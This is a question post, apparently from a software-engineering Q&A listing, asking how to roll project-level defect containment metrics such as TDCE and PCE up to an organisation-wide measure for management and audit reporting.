    Defect containment metrics, such as total defect containment effectiveness (TDCE) and phase containment effectiveness (PCE), can be used to give a good indicator of the quality of the process. TDCE captures the defects that are captured at some point between requirements and the release of a product into the field, indicating the overall effectiveness of the entire process to find and remove defects. PCE provides more detail at each phase of the software development life cycle and how the defect detection and removal techniques are working. Applying these metrics makes sense at a level where you have a well-defined process and methodology for product development, often a project. However, some organizations provide a process framework that is tailored at the project level. This process framework would include the necessary guidance for meeting certifications (ISO9001, CMMI), practices for incorporating known good techniques (agile methods, Lean, Six Sigma), and requirements for legal or regulatory reasons. However, the specific details of how to gather requirements, design the system, produce the software, conduct test, and release are left to the product development teams. Is there any effective way to apply defect containment metrics at an organizational level when only a process framework exists at the organizational level? If not, what might be some ideas for metrics that can be distilled from each project (each using a tailored process that fits into the organizational process framework) that captures defect containment metrics to discuss the ability of the process to find and remove defects? The end goal of such a metric would be to consolidate the defect containment practices of a large number of ongoing projects and report to management. The target audience would be people in roles such as the chief software engineer and the chief engineer (of all engineering disciplines) for the organization. Although project specific data would be available, the idea is to produce something that quantifies the general effectiveness of all tailored processes across all ongoing projects. I would suspect that this data would also be presented as part of CMMI, ISO, or similar audits to demonstrate process quality.

    Read the article

< Previous Page | 285 286 287 288 289 290 291 292 293 294 295 296  | Next Page >